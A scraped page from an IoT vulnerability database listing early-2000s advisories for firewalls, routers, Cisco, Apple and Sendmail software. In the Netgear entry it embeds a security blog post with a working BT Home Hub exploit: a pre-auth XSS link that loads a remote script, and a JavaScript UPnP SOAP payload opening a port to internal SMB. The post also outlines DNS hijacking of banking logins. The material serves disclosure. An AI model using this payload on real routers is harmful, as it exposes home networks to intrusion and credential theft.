VARIoT IoT vulnerabilities database

Kerio Personal Firewall (KPF) 2.1.4 has a default rule to accept incoming packets from DNS (UDP port 53), which allows remote attackers to bypass the firewall filters via packets with a source port of 53. Reportedly, KPF suffers from a vulnerability whereby the existing firewall filters may be bypassed. This vulnerability exists due to the fact that UDP traffic to and from port 53 is allowed. Allegedly, an attacker may craft a special packet with a source port of 53 and send this packet to a vulnerable system. KPF will allow this packet to proceed thus bypassing the firewall filters

SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service (device reset) via a long HTTP POST to the internal interface, possibly due to a buffer overflow. The firewall device will reset, resulting in a loss of availability while it goes through this cycle. This may be the result of a buffer being overrun, however, this has not been confirmed. SonicWALL PRO is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs

A vulnerability has been reported for Cisco Catalyst switches that may result in unauthorized access to the enable level. The vulnerability exists due to the way the 'enable' mode is accessed through the switch. An attacker who is able to obtain command line access to a vulnerable switch is able to access 'enable' mode without a password.

The HP JetDirect printer is a printer with integrated network capabilities developed by Hewlett-Packard. The FTP directory in the HP JetDirect printer is writable, and a remote attacker can exploit this vulnerability to perform a denial of service attack on the print service. Since the HP JetDirect printer's directory permissions for its FTP service are not set correctly, any files sent to the Jetdirect FTP service can be printed, and an attacker can send a large number of requests for a denial of service attack. It has been reported that HP JetDirect Printers accept documents from any source without access control limitations. This could lead to a denial of service or abuse of printing services

Buffer overflow in the administration service (CSAdmin) for Cisco Secure ACS before 3.1.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long user parameter to port 2002. It has been reported that some versions of the Cisco Secure ACS software do not properly handle input supplied during authentication. Because of this, it may be possible for a remote attacker to gain unauthorized access to a host using the vulnerable software. The management service of Cisco Secure ACS listens on TCP port 2002 and provides WEB-based management. When CSAdmin processes the login request, there is a buffer overflow. If an overlong user parameter is sent to the service program, the service can be suspended, and it needs to be restarted to obtain normal service. It may execute arbitrary commands with system privileges. The BUG ID of this vulnerability is: CSCea51366

The (1) instdbmsrv and (2) instlserver programs in SAP DB Development Tools 7.x trust the user-provided INSTROOT environment variable as a path when assigning setuid permissions to the lserver program, which allows local users to gain root privileges via a modified INSTROOT that points to a malicious dbmsrv or lserver program. SAP is an integrated enterprise resource planning system based on client/server architecture and open systems, including database open tools when installed. The SAP database program instlserver has problems handling environment variables. Local attackers can exploit this vulnerability for privilege escalation attacks and gain root user privileges. The instlserver program uses the user-supplied data and still runs with ROOT privileges when chmod and chown some files. When running the 'DevTool/bin/instlserver' program, according to the environment variable 'INSTROOT', the specified file will be chowned and chmoded. The attacker builds a malicious file and stores it in the location specified by the environment variable, and gets a suid root. Properties of the program, thereby increasing permissions

DirectoryServices in MacOS X trusts the PATH environment variable to locate and execute the touch command, which allows local users to execute arbitrary commands by modifying the PATH to point to a directory containing a malicious touch program. Apple MacOS X DirectoryService is prone to an issue which may allow local attackers to gain elevated privileges. This issue is due to usage of libc system() function to execute commands. Attackers may potentially set a PATH environment variable that causes an arbitrary file to be executed with elevated. Exploitation may require the attacker to abuse other known issues (BID 7323) to crash the service. DirectoryServices is the MacOS X information and authentication subsystem, which is started during the startup phase and installed with the default setuid root attribute. To exploit this vulnerability, you must first stop the DirectoryServices service, which can be done by repeatedly connecting to port 625

Mac OS X before 10.2.5 allows guest users to modify the permissions of the DropBox folder and read unauthorized files. A vulnerability has been discovered in Apple MacOS X 10.2.4 and earlier. The problem occurs when various file sharing services are enabled. The issue occurs in the privileges granted to 'guest' users, when accessing shared folders. Due to a design error, it may be possible for an unprivileged user to change the permissions of a write-only directory, effectively revealing its contents. Information obtained through exploiting this vulnerability could aid an attacker in launching further attacks against a target system. Mac OS X is an operating system used on Mac machines, based on the BSD system. An issue in the way Mac OS X handles file-sharing services could allow remote attackers to gain access to sensitive file information. Using this information can help attackers further attack the system

The Linsys BEFVP41 is a VPN-enabled router. Linsys BEFVP41 has a default community string that can be exploited by remote attackers to obtain a large amount of sensitive information on the target network. The external interface of the Linksys VPN router uses the default globally readable 'public' community string. Using this community string, you can obtain sensitive information such as routers and host hardware addresses in the internal network. This information can be used to further attack the network. Linksys BEFVP4 VPN router has been reported prone to a sensitive information disclosure vulnerability. It should be noted that this issue has also been reported to affect the Linksys BEFSR81 appliance

The Buffalo WBRG54 is a router for wireless broadband. Buffalo WBRG54 has problems handling super-multiple ICMP packets, which can be exploited by remote attackers to perform denial of service attacks on devices. According to the vulnerability finder's test, it uses two broadband routers WBR-g54 (the first one is: g54-01, the second is g54-02), and both connections are peer-to-peer mode connections: [atacker PC ]--[g54-01]-.-.-per-to-pear-.-.-[g54-02]--[victim PC] If you use a lot of ICMP packets (ping -f <victim IP can be used in Linux) >) Submitted to the device, which can cause the connection to be broken. A vulnerability has been reported for the WBRG54 device that may result in a denial of service. The vulnerability occurs when a vulnerable device receives numerous ICMP packets. In some cases, this will result in the device behaving unpredictably and denying service

Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router uses a port blocking rule vulnerability when using the UPnP feature, which can be exploited by remote attackers to bypass restricted access to restricted ports. Netgear FM114P allows blocking of some ports, restricting external users from accessing the internal network or restricting internal users from connecting to the WAN. If remote access and UPnP functions are enabled in the device, remote users can submit UPnP SOAP request connections to bypass rule access restrictions. port,

Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5 It's known that UPnP [1] is inherently insecure for a very simple reason: administrative tasks can be performed on a Internet Gateway Device (IGD) without needing to know the admin password whatsoever! This on its own is quite scary and I personally feel that although there is some research in the public domain, there is much more attention that needs to be paid to UPnP. UPnP allows you to perform administrative functions. Some functions are very standardized and supported by most devices. Examples include obtaining network settings, and enabling port forwarding rules. Other functions are make/model specific. Some very scary functions such as obtaining administrative username and password pairs have been reported [2] in the past. As a reminder, this works without submitting any administrative password whatsoever since UPnP is a authenticationless protocol. On top of this, most IGDs support UPnP by default. After having read several UPnP security research materials I realized that all the described attacks assume that the attacker (be it human or malware) comes from inside the network. This post describes how to exploit IGDs remotely via UPnP even when no services are publicly available (WAN interface). ** Preauth XSS + SOAP payload = remote UPnP exploitation ** If you sniff yourself while running software that uses UPnP in the background to help you configure your router, you'll see that UPnP is nothing more than SOAP. Our AJAX knowledge tells us about a feature that allows us to craft arbitrary XML requests: the XMLHttpRequest [3] object. Trouble is, such object can only be used within the context of the site that the requests are submitted to. So if we host the malicious scripting code on a third-party site, and a victim user located in the same LAN as the target IGD visits such page, the request wouldn't go through due to XMLHttpRequest same-origin policy restricition. Or put in a different way: you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from. However, if you find a pre-auth XSS vulnerability [4] on the target device you can bypass such restriction. For instance, many devices such as the BT Home Hub and Speedtouch routers offer certain pages before authenticating. Some of these pages are cgi scripts which are vulnerable to XSS. Although offering certain "useless" functionalities before logging into the router might not seem like a big deal, it can actually lead to UPnP being exploited remotely, even if the web admin console is not visible from the Internet! The following is a non-malicious proof-of-concept exploit which sets up a port-forwarding rule from port 1337 on the WAN interface to port 445 on the internal IP address 192.168.1.64. Such IP address is the first usable IP address reserved for clients connected to Speedtouch and BT Home Hub routers. The exploit has been tested on BT Home Hub - Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled by default on the BT Home Hub, just like most IGDs. If your Internet gateway is a BT Home Hub, clicking on the following link should add a new forward rule called EVILFORWARDRULE: ATTACK <http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=> In order to check if the port-forwarding rule was added successfully you can use UPnP Port Forwarding Utility [5] and simply click on "Update list now" after the device has been discovered (device name should show on the top-left corner a few seconds later after launching the tool). You could of course use the technique and code explained in this post on any Internet gateway that supports UPnP and is a vulnerable to a preauth XSS vulnerability. If you manage to successfully test this attack on the BT Home Hub or any other device please let us know! ** Zombie routers and the unvalidated NewInternalClient bug ** A bit of more UPnP hacking lead me to realize that the BT Home Hub is vulnerable to the (in)famous unvalidated NewInternalClient bug. This bug allows you to choose external IP addresses instead of a LAN IP addresses as intended when setting up port-forwarding rules via UPnP. In this case, I reused the previous code and changed the internal IP address (192.168.1.64) in the NewInternalClient tag with the IP address of a random Internet web server and the value of the NewInternalPort tag to 80. This effectively allows an attacker to use the vulnerable BT Home Hub router as a proxy - aka onion router. In other words, when probing the router's NATed IP address on port 1337, the attacker is effectively probing the IP address and port number specified by the port-forwarding rule - except the routers IP address would be shown in logs of the target web server, as opposed to the attacker's real IP address. I thought this is a nice real example of how a vulnerable router can be used as a zombie by simply having a user visit a page with malicious scripting (XSS + UPnP SOAP request). Imagine running your favourite vulnerability scanner against a target site, while using the victim user's router as a proxy - sweet! There are other UPnP functionalities besides port forwarding rules that look potentially interesting from a hacking point of view. For instance, SetDNSServer [6] allows you to guess what, set the gateway's DNS server. Imagine someone changing your router's DNS server setting by simply visiting a webpage. After that you visit yourfavoritebank.com and guess what, you're actually visiting a malicious server that is harvesting all your banking login details! I'll leave the exercise of writing a remote UPnP exploit that changes the DNS server setting on the BT Home Hub (or any other vulnerable router) to the reader. ** About GNUCITIZEN ** GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community. GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is the mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better. [1] http://www.upnp.org/resources/whitepapers.asp [2] http://www.securityfocus.com/bid/7267/discuss [3] http://www.w3.org/TR/XMLHttpRequest/ [4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4 [5] http://www.codeproject.com/KB/IP/PortForward.aspx [6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String) // http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss var req; var url="/upnp/control/igd/wanpppcInternet"; function loadXMLDoc(url) { req = false; // branch for native XMLHttpRequest object if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } // branch for IE/Windows ActiveX version } else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { req = false; } } } if(req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader('SOAPAction', '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"'); req.send('<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">1337</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">445</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">192.168.1.64</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">EVILFORWARDRULE</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'); } } function processReqChange() { // only if req shows "loaded" if (req.readyState == 4) { // only if "OK" if (req.status == 200) { // ...processing statements go here... //alert(req.responseText); } else { alert("There was a problem retrieving the XML data:\n" + req.statusText); } } } loadXMLDoc(url); -- pagvac gnucitizen.org, ikwt.com

Cross-site scripting (XSS) vulnerability in block-Forums.php in the Splatt Forum module for PHP-Nuke 6.x allows remote attackers to inject arbitrary web script or HTML via the subject parameter. The PHP-Nuke 'block-Forums.php' does not sufficiently sanitize data supplied via form fields, making it prone to HTML injection attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code

The client for Symantec Norton AntiVirus Corporate Edition 7.5.x before 7.5.1 Build 62 and 7.6.x before 7.6.1 Build 35a runs winhlp32 with raised privileges, which allows local users to gain privileges by using certain features of winhlp32. Applications or Services that call the Windows Help function in an insecure manner may allow a user unauthorized access to resrouces on the system. Applications or Services that call the Windows Help function in an insecure manner may allow a user unauthorized access to resrouces on the system. This issue may occur in applications or services where the Help function is not called in a secure manner. An example of this is when Anti-virus software or a personal firewall is running on the local system with the privileges of an administrator on the local system, and has an interface to "communicate" with the user. ISIHARA Takanori reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.A user may gain unauthorized access to resources on the system

Buffer overflow in Apple QuickTime Player 5.x and 6.0 for Windows allows remote attackers to execute arbitrary code via a long QuickTime URL. Apple's QuickTime Player is a player for files and streaming media in the QuickTime format. Versions of the player are available for both the Microsoft Windows and Apple MacOS platforms. It has been reported that the QuickTime Player does not properly handle some types of URLs. Apple QuickTime Player is a multimedia playback software developed by Apple (Apple). The software is capable of handling multiple sources such as digital video, media segments, and more. When the player processes the QuickTime URL, the application will extract the key value HKEY_CLASSES_ROOT/quicktime from the Windows registry key: \\%PATH TO QUICKTIME\\%\QuickTimePlayer.exe -u\"\\%1\" When the URL contains 400 character will destroy the buffer space allocated in the stack and overwrite the saved instruction pointer

The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337. Sendmail contains a buffer overflow in code that parses email addresses. A remote attacker could execute arbitrary code or cause a denial of service on a vulnerable system. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed Sendmail 8.12.9. Most organizations have various mail transfer agents (MTAs) at various locations within their network, at least one of which is directly connected to the Internet. Sendmail is one of the most popular MTAs. According to statistics, Internet mail traffic handled by Sendmail accounts for 50\\% to 75\\% of the total. Many UNIX and Linux workstations run Sendmail by default. This vulnerability exists in the prescan() process. The vulnerability is for messages, not connections. This means that the vulnerability is triggered by the content of a specially crafted email message, rather than by lower-level network communications. This is important because a non-vulnerable MTA can send malicious messages along with other protected MTAs in the network. In other words, even if the software used by the boundary MTA of the site is not sendmail, the sendmail service program with loopholes inside the network is still threatened. Messages that exploit this vulnerability can also pass through many common packet filters or firewalls undetected

D-Link DSL-500 is a DSL broadband router.  The D-Link DSL-500 has a default public SNMP community string. Remote attackers can use this SNMP community string to obtain sensitive information contained in the device, such as user names and passwords.  The D-Link DSL-500 installed by default enables the SNMP service program, which contains the default community strings public and private, which can read and modify the device.  In addition, ISP account information such as login names and passwords are stored in the device in clear text. Attackers can use this vulnerability to obtain password information.

The D-Link DI-614+ is a wireless router made by D-LINK. The D-Link DI-614+ wireless router does not handle the special fragmented IP packets incorrectly. A remote attacker can exploit this vulnerability to reset the router and cause a denial of service. An attacker sends a fragmented packet with a malicious size parameter to the affected device, causing the device to reboot and fail to handle normal communication. It has been reported that the implementation of the Internet Protocol (IP) in the firmware of the D-Link DI-614+ wireless router is vulnerable to a remotely exploitable denial of service condition. There is existing source code that exploits similar, older vulnerabilities that can be used to successfully exploit this vulnerability. When exploited, the device will reboot instantly. This will result in a denial of service until the device has restarted

The DNS server for Cisco Content Service Switch (CSS) 11000 and 11500, when prompted for a nonexistent AAAA record, responds with response code 3 (NXDOMAIN or "Name Error") instead of response code 0 ("No Error"), which allows remote attackers to cause a denial of service (inaccessible domain) by forcing other DNS servers to send and cache a request for a AAAA record to the vulnerable server. CSS11500 Content Services Switch is prone to a denial-of-service vulnerability

The HTTP proxy for Symantec Enterprise Firewall (SEF) 7.0 allows proxy users to bypass pattern matching for blocked URLs via requests that are URL-encoded with escapes, Unicode, or UTF-8. When a URL containing a pattern that matches a pattern blocking rule is submitted by a user behind the firewall, that HTTP request will be blocked. The URL rule filtering of the Symantec enterprise firewall lacks proper handling of some codes, and remote attackers can use this vulnerability to bypass security policies and access restricted resources. The HTTP pattern matching function is completed by analyzing the HTTP URL format and comparing the predefined feature database. When the configuration is successful, the request will be blocked and the \'\'403 Forbidden error\'\' message will be returned. However, if the requested URL uses a special encoding (such as escape code, Unicode, UTF-8, etc.), the parsing of the pattern matching will fail, and the attacker successfully bypasses the security rules and accesses the restricted resource